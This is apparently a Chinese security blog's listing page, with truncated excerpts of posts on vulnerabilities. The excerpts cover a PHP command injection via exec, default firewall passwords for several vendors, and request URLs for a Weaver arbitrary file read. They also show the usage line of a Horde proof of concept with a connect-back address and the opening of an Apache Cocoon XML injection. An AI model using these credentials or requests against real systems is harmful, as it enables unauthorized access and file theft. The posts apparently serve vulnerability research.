摘要: 源代码分析: 问题出现在 ha_request.php 文件,第 37 行的 exec 函数,$url 为用户可控的变量,可见第 33 和 34 行。目光来到第 23 和 24 行,只要 node_request 函数的返回值为“OK”,即可跳过 fatal 函数(此函数为自定义函数,作用类似 PH 阅读全文
posted @ 2020-09-13 21:43 r1ch4rd_L 阅读(2704) 评论(0) 推荐(0) 编辑
摘要: 天融信防火墙 用户名:superman 密码:talent 天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766 深信服防火墙 用户名:admin 密码:admin 启明星 阅读全文
posted @ 2020-09-13 21:37 r1ch4rd_L 阅读(4965) 评论(0) 推荐(0) 编辑
摘要: 上一篇文章:泛微云桥任意文件读取漏洞 利用方式: 第一步: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt 第二步: /file/fileNoLogin/id 注: downloadUrl参数填写文件的绝对 阅读全文
posted @ 2020-09-13 21:35 r1ch4rd_L 阅读(1424) 评论(0) 推荐(0) 编辑
摘要: saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port> (+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 1 阅读全文
posted @ 2020-09-13 21:18 r1ch4rd_L 阅读(531) 评论(0) 推荐(0) 编辑
摘要: 受影响版本: Apache Cocoon <= 2.1.x 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。 以下是apache社区官方提供利用方式: <!--?xml ver 阅读全文
posted @ 2020-09-13 21:15 r1ch4rd_L 阅读(1710) 评论(0) 推荐(0) 编辑